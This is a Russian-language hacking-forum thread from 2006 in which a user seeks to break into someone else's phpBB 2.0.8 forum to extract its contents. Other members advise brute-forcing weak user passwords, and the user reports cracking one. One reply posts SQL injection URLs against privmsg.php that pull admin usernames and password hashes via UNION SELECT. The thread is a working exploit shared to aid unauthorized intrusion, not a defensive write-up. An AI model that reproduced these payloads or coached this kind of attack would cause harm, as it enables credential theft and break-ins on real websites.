ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.05.2006, 23:56
|
|
Новичок
Регистрация: 06.03.2006
Сообщений: 5
Провел на форуме:
23518
Репутация:
0
|
|
phpBB 2.0.8
Есть сабж такой версии. Админка закрыта BASIC-AUTH. Сам форум тоже наполовину закрыт. Виден только список пользователей и подфорумы.
Только что подставил
profile.php?mode=register&agreed=true  и зарегился. Но активировать должен админ. Как быть в таком случае?
Что вообще можно сделать с ним? Цель - получить инфу в форуме.
Попробовал несколько способов 2.0.10 и выше - не сработали  |
|
|
11.05.2006, 00:06
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867
Репутация:
408
|
|
Ниче ты тут не сделаешь без активации.... Поищи уже активных юзверей по паролям типа 123, qwerty и т.д. а дальше можно и сплоитом.
|
|
|
|
11.05.2006, 00:20
|
|
Новичок
Регистрация: 06.03.2006
Сообщений: 5
Провел на форуме:
23518
Репутация:
0
|
|
да я вот и ищу. думал может еще какой то способ есть. ведь форум то старый. хотя некоторые заплатки поставили. а если найду пасс для юзеря - то впринципе уже ничего и ненадо будет.
=========================
УРА! Отбрутил пасс. Как теперь можно копнуть в сторону админа?
Последний раз редактировалось crazyhacker; 11.05.2006 в 00:42..
|
|
|
|
11.05.2006, 00:53
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867
Репутация:
408
|
|
Программа: phpBB 2.0.8
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость в проверке правильности входных данных обнаружена в phpBB в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код.
Пример:
_http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm
.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password, null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,nu
ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
URL производителя:
http://www.phpbb.com/ |
|
|
|
11.05.2006, 19:32
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
Kez делал брут,так что в поиск по его созданным темам и бруть пользователей с простыми пассами.
|
|
|
|
11.05.2006, 20:48
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
|
|
|
|
12.05.2006, 16:03
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
А воще qBiN Яисал уязвимости форумов php-bb до последней версии.
"Яисал" типа я писал? Учимся писать попонятнее)
Тема закрыта,ибо все остальное можно найти в поиске\прикрепленных темах
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
